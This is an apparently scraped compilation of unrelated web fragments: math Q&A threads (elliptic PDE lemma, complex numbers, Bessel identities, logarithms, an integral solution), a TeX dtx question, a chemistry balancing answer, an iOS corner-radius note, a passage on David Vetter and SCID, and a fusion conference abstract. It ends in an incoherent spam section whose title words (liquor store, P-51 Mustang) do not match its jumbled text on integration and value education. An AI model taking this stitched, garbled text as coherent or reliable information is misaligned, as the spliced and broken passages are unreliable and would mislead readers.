will get a 7.5 meter head start. Posted on April 11, 2011 by eburnsmth212 . 14 05 07 The Fal Of Linear Relationships Simple And Complex Word. Some students may choose to solve some of the problems by using a single variable and equation. Project Deadline: Tuesday, April 4, 2017 @ beginning of class. The equation are given in the screenshot below. We develop several variants of iterative methods that converge to the solution of the uncorrupted system of equations, even in the presence of large corruptions. Systems of Linear Equations Project By: Lejla Hamzic and Taylor Martin. Having 1 equation is not enough, because 1 equation in 2 unknowns is represented by an entire line. You have created a system of two equations in two unknowns. System of linear equations: 2x1 + x2 = 100 - a x1 + x2 - x3 - x4 = 0 - b x1 - x3 - x5 = 50 - c x2 - x4 - x5 = 120 - d x2 + x3 - x4 + x5 = 0 - e = Solution: In order to solve for the unknown variables, I created equations for the known values given in the project; That is 100 + 50 = 150 Mbps, being the total rate at which data is transmitted over a network to five routers. 2.2 Iterative methods (Jacobi, Gauss-Seidel).
|
I am studying an article of Berestychi-Caffarelli-Niremberg - Monotonicity for elliptic equations in unbounded Lipschitz domains, and I don't understand a convergence in the demonstration of the lemma 3.4.
Suppose that $u\in C^2(\Omega)\cap C(\overline\Omega)$, such that $$\left\{ \begin{array}{rl} \Delta u+f(u)=0, & in \ \Omega,\\ u=0, & on \ \partial\Omega,\\ 0<u<1, & in \ \Omega, \end{array} \right.$$ where $\Omega=\{x=(x',x_n)\in\mathbb{R}^n\times\mathbb{R};x_n>\varphi(x')\}$, with $\varphi$ is a Lipschitz function.
LEMMA 3.4: For any $h>0$, the solution $u$ is bounded away from $1$ in $\Omega_h=\{x\in\Omega;\varphi(x')<x_n<\varphi(x')+h\}$.
Sketch of the proof: Suppose by contradiction that exists a sequence $(x'^j,x_n^j)_j=(x^j)_j\subset\Omega_h$ such that $u(x^j)\rightarrow1$. By the translation $T^j(x)=x-x^j$ we move the set $\Omega$ to $\Omega^j$, given by $$\Omega^j=\{z=(z',z_n)\in\mathbb{R}^n;z_n>\varphi^j(z')=\varphi(z'+x'^j)-x_n^j\}.$$ Is easy to verify that the functions $\varphi^j$ is Lipschitz continuous and uniformly bounded in compact sets, so by the Arzela-Ascoli Theorem, for a subsequence $\varphi^j$ tend to a function $\widehat\varphi$. For each set $\Omega^j$ you have a shifted solution $$u^j(z',z_n)=u(z'+x'^j,z_n+x_n^j),$$ satisfying $$\left\{ \begin{array}{rl} \Delta u^j+f(u^j)=0, & in \ \Omega^j,\\ u^j=0, & on \ \partial\Omega^j,\\ 0<u^j<1, & in \ \Omega^j, \end{array} \right.$$
FINALLY, the doubt: In the article, he says that the shifted solutions converge uniformly in compact subsets of $$\widehat\Omega=\{x\in\mathbb{R}^n;x_n>\widehat\varphi(x')\},$$ to a solution $\widehat u$ that satisfies $$\left\{ \begin{array}{rl} \Delta \widehat u+f(\widehat u)=0, & in \ \widehat\Omega,\\ \widehat u=0, & on \ \partial\widehat\Omega,\\ \end{array} \right.$$
If the initial sequence $(x^j)_j$ is bounded, I can to argument this implies (Because in compact sets, the shifted solutions and the first and second derivatives, would be uniformly continuous and uniformly bounded, then you could apply the Arzela-Ascoli theorem). But I think that the sequence could be unbounded, I don't know. Someone can help me in this argument?
Thank you.
-
First of all, you should think of the sequence $(x^j)$ as unbounded, because if it had a finite limit, we'd immediately hit a contradiction: $x^j\to x\in \partial \Omega$, $u\in C(\overline{\Omega})$, and $u(x)=0$.
The reason for convergence of shifted solutions on compact sets is also Arzela-Ascoli, but we need uniform continuity on an unbounded set, which does not come for free.
Claim: For any $C>1$ the solution $u$ is uniformly Lipschitz on the set $\Omega_C=\{x: C^{-1}\le d(x)\le C\}$ where $d(x)=\operatorname{dist}(x,\partial\Omega)$.
Proof. The function $u$ solves the Poisson equation $\Delta u = g$ where $g=f\circ u$. Notice that both $u$ and $g$ are bounded in $\Omega$. The standard inner regularity result for the Poisson equation (Theorem 3.9 in Gilbarg-Trudinger) implies that $\nabla u$ is uniformly bounded in $\Omega_C$. (Why? Because any point $x\in \Omega_C$ is the center of a ball of radius $C^{-1}$ contained in $\Omega$. Apply the theorem on this ball, and recall that $u$ and $\Delta u$ are uniformly bounded.) It follows that $u$ is Lipschitz on $\Omega_C$. $\Box$
When we fix a compactly contained subdomain $G\Subset \widehat{\Omega}$ and consider the restrictions $u^j$ to $G$, we are actually looking at the restriction of $u$ to a subset of $\Omega_C$. Hence $u^j$ are uniformly Lipschitz on $G$. Since $f$ is Lipschitz and $\Delta u^j=f(u^j)$, it follows that the sequence $\Delta u^j$ is uniformly Lipschitz as well. By Theorem 4.6 in Gilbarg-Trudinger, this implies uniform Hölder continuity of all second-order derivatives of $u^j$.
Therefore, we can choose a subsequence, still denoted $u^j$, such that both $u^j$ and $D^2 u^j$ converge uniformly on $G$. Say, $u^j\to \widehat{u}$ and $\Delta u^j \to g$. We should check that $\Delta \widehat{u}=g$. To that end, pick a test function $\psi$ supported in $G$, and observe that $$\int u^j\Delta\psi\to \int \widehat{u}\,\Delta\psi\tag{1}$$ $$\int \Delta u^j \,\psi\to \int g\,\psi\tag{2}$$ Since $\int u^j\Delta\psi = \int \Delta u^j \,\psi$ (integration by parts), the combination of (1) and (2) implies $\Delta \widehat{u}=g$.
-
Why the sequence $x^j$ can not converge to a point in the interior of $\Omega$? – Tomás Jan 23 '13 at 0:28
@Tomás Good point. If $x^j\to x\in\Omega$ then $u(x)=1$, contradicting an earlier result in the paper, Theorem 1.2 (a). – user53153 Jan 23 '13 at 0:35
Why the laplacian converges in $\widehat\Omega$? What is the explanation to $\Delta\widehat u+f(\widehat u)=0$ in $\widehat\Omega$? – José Carlos Jan 24 '13 at 18:59
@JoséCarlos Since $\Delta u_j = -f(u^j)$, the functions $\Delta u_j$ also form a uniformly convergent sequence. Uniform convergence of $u_j$ and $\Delta u_j$ implies uniform convergence of all derivatives of 1st and 2nd order. Indeed, take $v=u^j-u^k$ and apply Poisson equation estimates from Chapter 3 of GT to $u$. – user53153 Jan 24 '13 at 19:34
I have two doubts yet. First of all, before to read this article, I thought that to define a sequence of functions, the functions would need to be defined in the same set, but in this case, we have one different set to each $u^j$. Is this not a problem? In the end, for each compact set $K$, we have to consider the restriction of the sequence in the compact, ok? My second doubt, is about your second answer. Could you explain better, why the first and the second derivative are uniformly convergent? Thank you very much, you are helping me a lot. – José Carlos Jan 25 '13 at 15:43
|
1. ## Complex Number
Can help me to solve this?
1. Given that $(1+5i)p-2q=3+7i$, find the values of p and q when p and q are respectively a complex number and its conjugate.
2. Given that the complex number z and its conjugate z* satisfy the equation $zz*+2zi=12+6i$, find the possible values of z.
3. Given that z=x+yi and $w= \frac {z+8i}{z-6}$. If w is totally imaginary, show that $x^2+y^2+2x-48=0$.
1. p=2-i, q=2+i
2. 3-i, 3+3i
2. Originally Posted by cloud5
3. Given that z=x+yi and $w= \frac {z+8i}{z-6}$. If w is totally imaginary, show that $x^2+y^2+2x-48=0$.
We solved a problem like this one in this thread: http://www.mathhelpforum.com/math-he...ex-number.html
01
3. Going a bit backwards here:
Originally Posted by cloud5
2. Given that the complex number z and its conjugate z* satisfy the equation $zz*+2zi=12+6i$, find the possible values of z.
$zz*+2zi=12+6i$
If $z = a + bi$, then $z* = a - bi$:
\begin{aligned}
(a + bi)(a - bi) + 2(a + bi)i &= 12+6i \\
a^2 + b^2 + 2ai -2b &= 12 + 6i \\
(a^2 + b^2 - 2b) + 2ai &= 12 + 6i
\end{aligned}
Now equate the real and imaginary coefficients:
\begin{aligned}
a^2 + b^2 - 2b &= 12 \\
2a &= 6 \\
a &= 3 \\
9 + b^2 - 2b &= 12 \\
b^2 - 2b -3 &= 0 \\
(b - 3)(b + 1) &= 0 \\
b &= 3\;\;{\color{red}or} \\
b &= -1
\end{aligned}
So the answers, in the form of a + bi, are
3 + 3i and
3 - i.
Originally Posted by cloud5
1. Given that $(1+5i)p-2q=3+7i$, find the values of p and q when p and q are respectively a complex number and its conjugate.
This looks like the same problem as #2. Substitute a + bi for p and a - bi for q. Set the real and imaginary coefficients equal to each other and solve for a and b.
01
|
# how to organise common preamble of dtx files
I have some new packages (see latexthesistemplate/trunk/packages/template
which all use a shared preamble file. I want all of them to have the same packages and commands available and the same layout. These packages shall be uploaded to ctan as soon as the documentation is final.
I could place these preamble files in every dtx file, but that would be only extra work. Or I could create a new class file just for my own package documentation.
However we have so many non-documented package documentation classes that I do not want to add one. Especially since miss a lot of functionality in the standard documentation class.
Is there any other option?
-
It appears to be only three files, so I'd just include them in each dtx file, it isn't so much extra considering all the rest of the documentation overhead.
However If you do want a special class file for this, to pick up on your comment about lacking functionality from the standard class, there is no need to lose functionality. Just make a mydoc.cls that looks like
\ProvidesClass{mydoc}
Then your class will have all the same functionality and options as ltxdoc
|
# More log questions.
## Main Question or Discussion Point
I have a couple more log questions Im stuck on. They keep giving me log questions that they never showed me how to do.. very fustrating!
I need to evaluate the following logarithms:
68 a). log22^log55
I dont even know where to begin.. I never done a log with an exponent log???
69. log25=log2(x+32)-log2x
Determine the derivative of:
70 c) y= 2x^3 e^4x
e) y= square root(x^3 + e^-x +5)
I know this one should probably go to. (x^3 + e^-x +5)^1/2... then,
dy/dx= (x^3 + e^-x +5)^1/2 * 1/2(x^3 + e^-x +5)^-1/2 * (3x^2)now im confused??? does the e^-x have a derivative?? like -xe^-2?? i got no idea.
THANKZ YA!
Last edited:
For part a, is that
$$(\log_{2}2)^{\log_{5}5}$$ or $$\log_{2}(2)^{\log_{5}5}$$?
umm there are no brackets, but i think the 2 is in part with the log2
Pyrrhus
Homework Helper
Hrm
$$\log_{5} 5 = 1$$
$$5^1 = 5$$
$$log_{2} 5= log_{2} (x+32) - log_{2} x$$
$$log_{2} 5= log_{2} \frac{x+32}{x}$$
$$5 = \frac{x+32}{x}$$
Last edited:
|
# Simplify 5 square root of 7-4x square root of 7-x square root of 7
Subtract from .
Simplify 5 square root of 7-4x square root of 7-x square root of 7
|
# Plot a curve on a lattice
How do I plot a 2d curve and label lattice points to one side of it?
I want to plot the curve $f[x]=\frac{1}{x}$, and draw a solid red dot at every lattice point in the following set: $$\{(m,n)\in \mathbb N^2\colon mn\geq 1\}$$
• Make a lattice with Tuples, filter it with Select, plot with ListPlot, combine it with the curve using Show. Jul 23, 2015 at 6:37
• You can add something like Epilog -> {Red, Point[Flatten[Array[List, {5, 5}], 1]]} to your plot. Jul 23, 2015 at 6:41
In V10.1 or later, you can use CoordinateBoundingBoxArray to generate the lattice.
With[{m = 5},
|
# How to simplify an expression with special functions to zero
The following is a well-known Bessel function identity:
$$J_{-n}(z)=(-1)^n J_n(z),\qquad n\in\mathbb Z$$
To check this, I used the following code and the result is as what I expected.
In[2]:= FullSimplify[(-1)^n*BesselJ[n, z] == BesselJ[-n, z], n ∈ Integers]
Out[2]= True
The problem is that Mathematica does not return zero when I try to simplify the following expression:
$$(-1)^n J_{n}(z)-J_{-n}(z),\qquad n\in\mathbb Z$$
I tried the following code, but the output is as complex as the input:
In[3]:= FullSimplify[(-1)^n*BesselJ[n, z] - BesselJ[-n, z], n ∈ Integers]
Out[3]= -BesselJ[-n, z] + (-1)^n BesselJ[n, z] (*result I expected : 0*)
My goal is to command Mathematica to reduce the expression to zero, and I need some advice.
-
See also: Why FullSimplify doesn't work here? – becko Nov 19 '13 at 14:53
FullSimplify[(-1)^n*BesselJ[n, z] - BesselJ[-n, z], n ∈ Integers,
ComplexityFunction -> (StringLength @ ToString @ # &)]
Also:
ComplexityFunction -> (Count[#, _BesselJ | _Power, {-2}] &)
ComplexityFunction -> (Count[#, _?NumberQ, Infinity] &)
-
I daresay it is baffling that the usual approach of comparing LeafCount[]s doesn't work... – J. M. May 15 '13 at 16:50
@J.M. ComplexityFunction -> (StringLength @ ToString @ # & could be useful at the code golf site – belisarius May 15 '13 at 17:59
Actually, I don't know what (StringLength @ ToString @ # &) means. Nonetheless, I got some clues from looking at the other two options. The options you suggested are quite informative and could be utilized in many similar situations. – Tom Wayne May 16 '13 at 8:41
@Tom, it simply treats the expression being applied to as a string, and counts the number of characters in said string. – J. M. May 16 '13 at 11:19
@J.M. Now I got it. That's quite a compact form. – Tom Wayne May 17 '13 at 14:02
A bit of cheating:
DifferenceRootReduce[(-1)^n BesselJ[n, z] - BesselJ[-n, z], n]
0
I must admit I'm not sure why FullSimplify[] fails on this, tho.
-
Very nice. $\phantom{}$ – belisarius May 15 '13 at 15:50
That's a brilliant answer. Still, it's a mystery why FullSimplify doesn't work on this expression. – Tom Wayne May 15 '13 at 16:10
|
# How do you balance Co(OH)_3 + HNO_3 -> Co(NO_3)_3 + H_2O?
Apr 5, 2017
#### Answer:
$C o {\left(O H\right)}_{3}$ + $3 H N {O}_{3}$ $\rightarrow$ $C o {\left(N {O}_{3}\right)}_{3}$ + $3 {H}_{2} O$
#### Explanation:
You really have to know your complex ions for this one!
On the left side of the equation we see, initially, one nitrate group ($N {O}_{3}$) On the right, we have three. So that means on the left we need three nitrate groups which means three $H N {O}_{3}$ (aka nitric acids).
$C o {\left(O H\right)}_{3}$ + $3 H N {O}_{3}$ $\rightarrow$ $C o {\left(N {O}_{3}\right)}_{3}$ + ${H}_{2} O$ (not balanced)
Now, on the left side of the left side of the unbalanced equation we have six hydrogens, but on the right we only have two. We can fix that by putting a 3 coefficient in front of the water:
$C o {\left(O H\right)}_{3}$ + $3 H N {O}_{3}$ $\rightarrow$ $C o {\left(N {O}_{3}\right)}_{3}$ + $3 {H}_{2} O$
Now we see that all the hydrogens balance out on both sides (six and six), all the nitrate groups balance out (three and three), the cobalt is balanced (one and one), and the oxygen (not counting the oxygen we have with the nitrate groups we already counted!) is also balanced (three and three).
Notice what I did here: I treated the nitrate groups as distinct species and balanced them as a whole even though the nitrate group has both nitrogen and oxygen! If you think about it, you will probably realize that I could have done the same thing with the hydroxide groups--water is just a hydroxide group wiht an extra hydrogen.
Now try a few and see if treating the complex ions as individual species works for you.
|
Since 18 of December 2019 conferences.iaea.org uses Nucleus credentials. Visit our help pages for information on how to Register and Sign-in using Nucleus.
# 28th IAEA Fusion Energy Conference (FEC 2020)
10-15 May 2021
Nice, France
Europe/Vienna timezone
The Conference will be held virtually from 10-15 May 2021
## Transport Physics of the Density Limit
13 May 2021, 08:30
4h
Nice, France
#### Nice, France
Regular Poster Magnetic Fusion Theory and Modelling
### Speaker
P.H. Diamond (UCSD, USA)
### Description
The Greenwald density limit ($\bar{n}_g$) defines a fundamental bound on the tokamak operating space, and so is of central importance to magnetic fusion. Recent experiments (1) reinforce the suggestion (2) that the density limit occurs due to an abrupt increase in edge particle transport, with edge cooling and MHD phenomena following as secondary consequences. Here, we present a theory of degraded particle confinement as $\bar{n} \to \bar{n}_g$ due to edge shear layer collapse. The crucial microphysics is a breakdown of the self-regulating turbulence–shear flow feedback loop, due to a drop in flow production. Electron adiabaticity characterizes parameter regimes. Favorable scaling of particle transport and density with current, like the Greenwald $\bar{n} \sim I_p$, emerges from the effect neoclassical screening on zonal flow production. Higher current strengthens zonal flow shear for fixed drive. Zonal flow screening physics has implications for the scaling of the density limit in different devices.
Theoretical work (3) has identified the transition from adiabatic ($\alpha = \frac{k_\parallel^2 V_{th}^2}{\omega \nu} >1$) to hydrodynamic ($\alpha < 1$) electrons with increasing $n$ as a cause of the drop in Reynolds stress-driven production of shear flows, consistent with fluctuation studies close to the density limit (1). These are shown in Fig. 1. The physics mechanism is a transition from a regime of propagating drift waves, which generate a flow convergence and so a shear layer spin-up, to one of weakly propagating convective cells, with a consequently weak coherence of $\tilde v_r$ with $\tilde v_\theta$. In the latter, eddy tilting (symptomatic of flow generation) does not arise as a straightforward consequence of causality. Fig. 2 shows the scaling of transport fluxes with $\alpha$. Note that the particle flux increases for $\alpha <1$, while the vorticity gradient decreases there. This indicates that self-regulation fails in the hydrodynamic regime. Observe that the vorticity gradient ($\nabla u$) is a natural order parameter for the flow and superior to shear for prediction of suppression, since $\nabla u$ prevents local alignment of eddies with flow shear. Shear layer collapse is consistent with potential vorticity (PV—also total charge) conservation. However, for the $\alpha >1$ regime, PV fluxes of particles and vorticity (i.e. transport and zonal flow) are tightly coupled. For $\alpha <1$, the particles carry the PV flux. Thus, the different regimes manifest different branching ratios of the components of the PV flux, but the same total flux.
Flow–fluctuation–transport feedback is shown in Fig. 3. This suggests a unified picture of: the L-mode as a state of modest shear flow, the Density Limit as a state of weak flow, and the H-mode as a state of strong mean shear. The onset of the density limit by shear layer collapse emerges as a transport bifurcation.
Favorable current scaling is a salient feature of the Greenwald Limit. Theoretical work has identified the neoclassical ‘screening’ of the sheared zonal flow (ZF) as the physical mechanism underpinning the favorable $I_p$ scaling. Since the effective ZF scale is set by $\rho_\theta$ (4), effective ZF inertia is lower for larger current. An approximate scaling
$\tilde v_E^\prime \approx \frac{S_{k,q}}{\rho_i^2 + 1.6 \epsilon^{3/2}_T \rho_{\theta_i}^2} \sim \frac{ \sigma \left(\frac{e \phi}{T} \right)^2_{DW}}{\rho_{\theta_i}^2} \sim \sigma B_\theta ^2 \left(\frac{e \phi}{T} \right)^2_{DW}$
follows. $\left(\frac{e \phi}{T} \right)^2_{DW}$ is the drift wave intensity and $\sigma \sim n^{-\alpha}$ represents production. Higher current strengthens ZF shear, for fixed drive. DW-driven nonlinear noise scales $\sim B_\theta^4$, ensuring persistent excitation of the edge shear layer with increasing $B_\theta$. We see that reduced screening at high $I_p$ can “prop-up” the shear layer vs. weaker production. Favorable current scaling persists in the (ion) banana and plateau regimes, but weakens deep into the Pfirsch–Schlüter regime, also consistent with shear layer collapse at high $n$.
These results have implications for devices other than tokamaks. RFP’s are known to exhibit ‘Greenwald-like’ scaling, as $\bar{n}_g \sim I_p$. This is not surprising, since in RFP $\rho_i$ is set by the poloidal field, i.e. $\rho_i = \rho_{\theta_i i}$, so classical zonal flow screening is weaker (ZF shear stronger) at high $I_p$. In stellarators, the principal correction to classical screening is due to helically trapped particles. This has no obvious length scale (5), so ZF screening is classical. This feature likely explains why attempts to link stellarator density limits to magnetic geometry have failed, and why stellarator density limits appear higher than those in tokamaks.
Ongoing work is concerned with analysis of perturbative experiments of shear layer collapse and with studies of zonal flow evolution in layers with variable $\alpha(r)$. Of particular interest are bias-driven shear studies, which attempt to enhance shear layer persistence beyond $\bar{n}_g$, and elucidate the local dynamics of the density limit.
Research is supported by the U.S. DOE, and CNNC and MOST, China.
(1) R. Hong, et al., Nucl. Fusion 58, 016041 (2018)
(2) M. Greenwald, PPCF 44, 2194 (2002)
(3) R. Hajjar, P.H. Diamond, M. Malkov, PoP 25, 062306 (2018)
(4) M.N. Rosenbluth, F.L. Hinton, Phys. Rev. Lett. 80, 724 (1998)
(5) H. Sugama, T.H. Watanabe, PoP 13, 012501 (2006)
Affiliation University of California, San Diego United States
### Primary author
P.H. Diamond (UCSD, USA)
### Co-authors
R. Singh (UCSD, USA) Dr M. Malkov (UCSD, USA) R. Hajjar (UCSD, USA) G. Tynan (UCSD, USA) T. Long (SWIP, China) Rui Ke (SWIP, China)
### Presentation Materials
There are no materials yet.
|
## David Vetter, the bubble boy
T cells are a class of white blood cells without which a human being usually cannot survive. An exception to this was David Vetter, a boy who lived 12 years without T cells. This was only possible because he lived all this time in a sterile environment, a plastic bubble. For this reason he became known as the bubble boy. The disease which he suffered from is called SCID, severe combined immunodeficiency, and it corresponds to having no T cells. The most common form of this is due to a mutation on the X chromosome and as a result it usually affects males. The effects set in a few months after birth. The mutation leads to a lack of the $\gamma$ chain of the IL-2 receptor. In fact this chain occurs in several cytokine receptors and is therefore called the ‘common chain’. Probably the key to the negative effects caused by its lack in SCID patients is the resulting lack of the receptor for IL-7, which is important for T cell development. SCID patients have a normal number of B cells but very few antibodies due to the lack of support by helper T cells. Thus in the end they lack both the immunity usually provided by T cells and that usually provided by B cells. This is the reason for the description ‘combined immunodeficiency’. I got the information on this theme which follows mainly from two sources. The first is a documentary film ‘Bodyshock – The Boy in the Bubble’ about David Vetter produced by Channel 4 and available on Youtube. (There are also less serious films on this subject, including one featuring John Travolta.) The second is the chapter on X-linked SCID in the book ‘Case Studies in Immunology’ by Raif Geha and Luigi Notarangelo. I find this book a wonderful resource for learning about immunology. It links general theory to the case history of specific patients.
|
# Solve the following
Question:
Solve $\left|\frac{2 x-1}{x-1}\right|>2$
Solution:
As, $\left|\frac{2 x-1}{x-1}\right|>2$
$\Rightarrow \frac{2 x-1}{x-1}<-2$ or $\frac{2 x-1}{x-1}>2 \quad($ As, $|x|>2 \Rightarrow x<-2$ or $x>2)$
$\Rightarrow \frac{2 x-1}{x-1}+2<0$ or $\frac{2 x-1}{x-1}-2>0$
$\Rightarrow \frac{2 x-1+2 x-2}{x-1}<0$ or $\frac{2 x-1-2 x+2}{x-1}>0$
$\Rightarrow \frac{4 x-3}{x-1}<0$ or $\frac{1}{x-1}>0$
$\Rightarrow \frac{4 x-3}{x-1}<0$ or $x-1>0$
$\Rightarrow[(4 x-3>0$ and $x-1<0)$ or $(4 x-2<0$ and $x-1>0)]$ or $[x-1>0]$
$\Rightarrow\left[\left(x>\frac{3}{4}\right.\right.$ and $\left.x<1\right)$ or $\left(x<\frac{3}{4}\right.$ and $\left.\left.x>1\right)\right]$ or $[x>1]$
$\Rightarrow\left[\left(\frac{3}{4}1]$
$\Rightarrow\left[\frac{3}{4}$\Rightarrow \frac{3}{4}1\therefore x \in\left(\frac{3}{4}, 1\right) \cup(1, \infty)\$
|
Paul's Online Notes
Home / Calculus I / Integrals / More Substitution Rule
Show Mobile Notice Show All Notes Hide All Notes
Mobile Notice
You appear to be on a device with a "narrow" screen width (i.e. you are probably on a mobile phone). Due to the nature of the mathematics on this site it is best views in landscape mode. If your device is not in landscape mode many of the equations will run off the side of your device (should be able to scroll to see them) and some of the menu items will be cut off due to the narrow screen width.
### Section 5.4 : More Substitution Rule
11. Evaluate $$\displaystyle \int{{\frac{{8 - w}}{{4{w^2} + 9}}\,dw}}$$.
Show All Steps Hide All Steps
Hint : With the integrand written as it is here this problem can’t be done.
Start Solution
As written we can’t do this problem. In order to do this integral we’ll need to rewrite the integral as follows.
$\int{{\frac{{8 - w}}{{4{w^2} + 9}}\,dw}} = \int{{\frac{8}{{4{w^2} + 9}}\,dw}} - \int{{\frac{w}{{4{w^2} + 9}}\,dw}}$ Show Step 2
Now, the first integral looks like it might be an inverse tangent (although we’ll need to do a rewrite of that integral) and the second looks like it’s a logarithm (with a quick substitution).
So, here is the rewrite on the first integral.
$\int{{\frac{{8 - w}}{{4{w^2} + 9}}\,dw}} = \frac{8}{9}\int{{\frac{1}{{\frac{4}{9}{w^2} + 1}}\,dw}} - \int{{\frac{w}{{4{w^2} + 9}}\,dw}}$ Show Step 3
Now we’ll need a substitution for each integral. Here are the substitutions we’ll need for each integral.
$u = \frac{2}{3}w\,\,\,\,\,\,\left( {{\mbox{so }}{u^2} = \frac{4}{9}{w^2}} \right)\hspace{0.75in}v = 4{w^2} + 9$ Show Step 4
Here is the differential work for the substitution.
$du = \frac{2}{3}dw\hspace{0.25in} \to \hspace{0.25in}dw = \frac{3}{2}du\hspace{0.5in}dv = 8w\,dw\,\,\,\,\,\,\, \to \hspace{0.25in}\,w\,dw = \frac{1}{8}dv$
Now, doing the substitutions and evaluating the integrals gives,
\begin{align*}\int{{\frac{{8 - w}}{{4{w^2} + 9}}\,dw}} & = \frac{8}{9}\left( {\frac{3}{2}} \right)\int{{\frac{1}{{{u^2} + 1}}\,du}} - \frac{1}{8}\int{{\frac{1}{v}\,dv}} = \frac{4}{3}{\tan ^{ - 1}}\left( u \right) - \frac{1}{8}\ln \left| v \right| + c\\ & = \require{bbox} \bbox[2pt,border:1px solid black]{{\frac{4}{3}{{\tan }^{ - 1}}\left( {\frac{2}{3}w} \right) - \frac{1}{8}\ln \left| {4{w^2} + 9} \right| + c}}\end{align*}
Do not forget to go back to the original variable after evaluating the integral!
|
# How to set corner radius in iOS
Issue #582
## Use View Debugging
Run on device, Xcode -> Debug -> View debugging -> Rendering -> Color blended layer
On Simulator -> Debug -> Color Blended Layer
Okay. Talked to a Core Animation engineer again:
• cornerRadius was deliberately improved in Metal so it could be used everywhere.
• Using a bitmap is WAY heavier in terms of memory and performance.
• CALayer maskLayer is still heavy.
Setting the radius to a value greater than 0.0 causes the layer to begin drawing rounded corners on its background. By default, the corner radius does not apply to the image in the layer’s contents property; it applies only to the background color and border of the layer. However, setting the masksToBounds property to true causes the content to be clipped to the rounded corners.
When the value of this property is true, Core Animation creates an implicit clipping mask that matches the bounds of the layer and includes any corner radius effects. If a value for the mask property is also specified, the two masks are multiplied to get the final mask value.
layer.cornerRadius, with or without layer.maskedCorners causes blending
Use mask layer instead of layer.cornerRadius to avoid blending, but mask causes offscreen rendering
## Offscreen rendering
Instruments’ Core Animation Tool has an option called Color Offscreen-Rendered Yellow that will color regions yellow that have been rendered with an offscreen buffer (this option is also available in the Simulator’s Debug menu). Be sure to also check Color Hits Green and Misses Red. Green is for whenever an offscreen buffer is reused, while red is for when it had to be re-created.
Offscreen drawing on the other hand refers to the process of generating bitmap graphics in the background using the CPU before handing them off to the GPU for onscreen rendering. In iOS, offscreen drawing occurs automatically in any of the following cases:
Core Graphics (any class prefixed with CG)
The drawRect() method, even with an empty implementation.
CALayers with a shouldRasterize property set to YES.
).
Any text displayed on screen, including Core Text.
Group opacity (UIViewGroupOpacity).
|
Liquor Store Near Me Open Now, Schwinn Rascal Pet Trailer Xl, Booyah Pond Magic, Best Faygo Flavor Reddit, Lithops For Sale Near Me, My Belk Orders, Morning Yoga For Flexibility Beginners, Objectives Of Research Methodology, " />
## p 51 mustang facts
REGIONAL INTEGRATIONErnst B. HaasBIBLIOGRAPHYII. THE VALUE, PLACE AND METHOD OF TEACHING NATURAL SCIENCE IN THE … In a set of values listed in order, the median is whatever value is in the middle. Only value "in the eye of the beholder" was acceptable as genuinely scientific in this view. Jeremy’s Beliefs About Technology Integration in Science. As we mentioned in the previous section, traditional data integration was performed using batch processing (data on the rest), while big data integration can be done in Real-time or with batch processing. The symbol dx represents an infinitesimal Integration of Tabular Data This type of numerical integration is largely reserved for experimental data. These instructions will show you how to approximate integrals for large data sets in Microsoft Excel. Arts integration is an approach to teaching that integrates the fine and performing arts as primary pathways to learning. Nearly all of these integrals come down to two basic formulas: ∫ e x d x = e x + C, ∫ a x d x = a x ln (a) + C. \int e^x\, dx = e^x + C, \quad \int a^x\, dx = … » First i2S conference » Featured. Cross-curricular integration Teachers perceive that the cross-curricular nature of STEM education is beneficial to student learning, but secondary teachers may perceive barriers or challenges to cross-curricular programs (finding 4). Using the most probable value to fill in the missing value: Using algorithms like regression and decision tree, the missing values can be predicted and replaced. It has not been the year any of us expected and we hope you have been able to navigate it successfully. It is useful for when you want to see how some integral of the experimental data progresses over time. The applied school of “integrated valuation” is building on earlier traditions in sustainability science. Improving research impact on complex real world problems. Integral, in mathematics, either a numerical value equal to the area under the graph of a function for some interval (definite integral) or a new function the derivative of which is the original function (indefinite integral). FUNCTIONALISM AND FUNCTIONAL INTEGRATIONP. ISS courses were embedded in a reformed medical curriculum. In this study, the authors aimed at exploring the value and role of integrated supportive science (ISS) courses as a novel approach to address this challenge and to promote learning basic science concepts in medical education. There are two primary ways to perform numerical integration in Excel: Integration of Tabular Data Integration using VBA 1. 2012). As opportunity is concentrated in certain regions and countries, and in particular economic sectors, people respond in a number of ways. VAN STADEN MARCH 2006. November/December 2020 i2S News published » Welcome to the November/December i2S News, our last for 2020. The Positivists of this time sought to expel all "metaphysical" concepts from science and "value", in the sense of an objective substratum of value adhering in a commodity, was precisely one such concept. 6 December 2018 Rue du Commerce 44, 1000 Brussels Permanent Representation of the Republic of Slovenia to the EU . The Value of Social Science & Humanities in Europe. In experiment 1, we examined participants' ability to perform the task by presenting them with sequences of pairs of numbers at a rate of two or four pairs per second and asking them to select the alternative with the highest average (experiment 1; Fig. Plus, get practice tests, quizzes, and personalized coaching to help you succeed. 3. Noise is defined as a random variance in a measured variable. The long term objective of the conference and efforts of the organisers is to ensure that social sciences and humanities (SSH) receive their proper recognition in academia and society. using improvisational drama skills to learn about conflict in writing.) The main subjects of social sciences included Economics, Political Science, Geography, History and Sociology. Arts integration differs from traditional education by its inclusion of both the arts discipline and a traditional subject as part of learning (e.g. We need science to inform policy, objectively. Values in science education include values associated with teaching science in schools, epistemic values of science, societal values and the personal values of scientists. There are tons of projects out there online that integrate art and science, but the science is mixing a sensory goop. Presentation. from society. One of the most problematic is migration, whether internally or abroad. December 03, 2010. Reported by: Loraine B. Esta 1 2. Integration of Values into Primary Curriculum of Social Studies and Islamic Studies in Bangladesh Exponential functions occur frequently in physical sciences, so it can be very helpful to be able to integrate them. The integration of art into the curriculum for subjects like math and science has been shown to increase understanding and retention, and aids in the development of creative problem-solving skills. As a member, you'll also get unlimited access to over 83,000 lessons in math, English, science, history, and more. Integration and Implementation Sciences: i2S. The mean is the sum of a list of values divided by the number of values in that list. Median. Noisy data. Delivering value education to the individuals and examining their value systems during behavior change is an indispensable part of education. The art integration concept introduces tactics that teachers have known for a long time, namely, that bringing creativity into the classroom keeps students engaged. Science Measurement Workshop presented by the Office of Science and Technology Policy, Washington, DC. As a member, you'll also get unlimited access to over 83,000 lessons in math, English, science, history, and more. THE VALUE, PLACE AND METHOD OF TEACHING NATURAL SCIENCE IN THE FOUNDATION PHASE by LINDA BOSMAN submitted in fulfilment of the requirements for the degree of MASTER OF EDUCATION in the subject DIDACTICS at the UNIVERSITY OF SOUTH AFRICA SUPERVISOR: DR. C.J.S. We need to make decisions together − rather than from polarised positions − and to take responsibility for those decisions, based on sound scientific evidence. The economical and political gains stemming from science We need science to inform citizens and politicians in a trustworthy and accessible way. Fisher, Erik. Values integration involves the development of the values system of the learner as a part of the totality of his education. "Public Value Integration in Science and Innovation Policy Processes." The existence of value is not context specific. Integrating values with subject matter pot 1. 2 • is defined as organization of teaching matter to 